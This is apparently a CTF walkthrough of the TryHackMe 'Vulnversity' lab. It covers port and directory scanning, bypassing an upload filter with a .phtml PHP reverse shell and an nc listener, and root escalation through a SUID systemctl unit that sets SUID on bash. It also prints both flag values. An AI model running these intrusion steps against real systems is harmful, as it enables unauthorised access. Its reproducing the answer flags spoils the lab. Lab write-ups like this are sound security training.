Vulnversity Walkthrough TryHackMe

performed by: jb-williams

Reconnaisance

They first ask for you to search for any nmap resourses(cheatsheets) online, I came across this one that seemed really useful: https://www.stationx.net/nmap-cheat-sheet/

The First Real Question

Scan the box, how many ports are open?

I like to build up a chain of commands for most boxes.

  • While doing my scans I like to create a file that contains just the numerical port values to have. So my command came out like this:
nmap -v -T4 -sV -sC -oA nmap/initial 10.10.124.14 && grep -i "open" nmap/initial.nmap | cut -d' ' -f 1 | cut -d'/' -f1 | tee nmap/ports.txt | wc -l
  • Number of ports open: 6

What version of the squid proxy is running on the machine?

grep -i "squid" nmap/initial.nmap | awk '{print $NF}'
  • Version of Squid Proxy: 3.5.12

How many ports will nmap scan if the flag -p-400 is used?

  • Looking at man page or online resource: 400

Using the nmap flag -n what will it not resolve?

  • Looking at man page or online resource: DNS

What is the most likely operating system this machine is running?

grep -i "os" nmap/initial.nmap
  • Quickly scanning output, you can see that: Ubuntu is listed most.

What port is the web server running on?

grep -i "http" nmap/initial.nmap
  • Http server is on port: 3333

Its important to ensure you are always doing your reconnaissance thoroughly before progressing. Knowing all open services (which can all be points of exploitation) is very important, don’t forget that ports on a higher range might be open so always scan ports after 1000 (even if you leave scanning in the background)

Locating directories using GoBuster

Using gobuster:

GoBuster flag Description
-e Print the full URLs in your console
-u The target URL
-w Path to your wordlist
-U and -P Username and Password for Basic Auth
-p Proxy to use for requests
-c Specify a cookie for simulating your auth

What is the directory that has an upload form page?

gobuster dir -u http://10.10.124.148:3333 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -o gobuster.txt -t 15

I like using feroxbuster and it let me know more info esp. about the dir path sooner

feroxbuster -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -o ferox-initial.txt -t 15 -L 15 -s 200,302,304 -e -u http://10.10.124.148:3333/
  • The directory that has an upload form page is: /internal/ and /internal/uploads(but they don’t ask for this one, its just important to know about later)

Compromise the webserver

After finding the form to upload files:

What file type, which you’d wnat to upload to exploit the server, is blocked? Try a couple to find out.*

  • Fist, trying to upload a reverse shell: this was blocked reverseshell.php

  • The room walks you through using burp to fuzz the upload for, I wrote a python script to fuzz for me.:

  • Url for the room to follow the burp walkthrough:

  • Vulnversity

  • After testing different php file extensions, using curl,python,burp,zap to fuzz the upload form, you come across this one working: .phtml

  • Download this PHP revsere shell downloadLink - php-reverse-shell.phtml

  • Edit the file changing the IP to your tun0 THM IP and desired port.
  • Setup a listener on the port specified in the reverse shell ex:
nc -lnvp 4444
  • Upload the reverse shell on the upload form and navigate here to execute the payload http://<IP>:3333/internal/uploads/php-reverse-shell.phtml

What is the name of the user who managers the webserver?*

  • Once on the machine:

  • Ls the /home dir and see user: bill

  • What is the user flag?

  • Ls /home/bill and see user.txt

cat /home/bill/user.txt
  • The contents of user.txt: 8bd7992fbe8a6ad22a63361004cfcedb

Privilage Escalation

Per THM -
In Linux, SUID (set owner userId upon execution) is a special type of file permission given to a file. SUID gives temporary permissions to a user to run the program/file with the permission of the file owner (rather than the user who runs it).

For example, the binary file to change your password has the SUID bit set on it (/usr/bin/passwd). This is because to change your password, it will need to write to the shadowers file that you do not have access to, root does, so it has root privileges to make the right changes.

On the system search for all SUID files. What file stands out?

  • I tend to use this find command to search for SUID’s
find / -perm -4000 2>/dev/null
  • Sort of using my own system as a reference, I saw this one looking fairly unusual: /bin/systemctl

Become root and get the last flag (/root/root.txt)

  • Navigating to GTFOBins and search for that bin file.
  • I took the Sudo (b) one and modified it
TF=$(mktemp).service
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "chmod +s /bin/bash"
[Install]
WantedBy=multi-user.target' > $TF
/bin/systemctl link $TF
/bin/systemctl enable --now $TF

  • I literally copy/pasted that chunk into my terminal and ran it.
  • Then I ran bash -p to escalate to root
  • As root you can ls the /root dir: ls /root and see root.txt
  • Cat out root.txt cat /root/root.txt
  • The contents of root.txt: a58ff8579f0a9270368d33a9966c7fd5

written and performed by jb-williams - github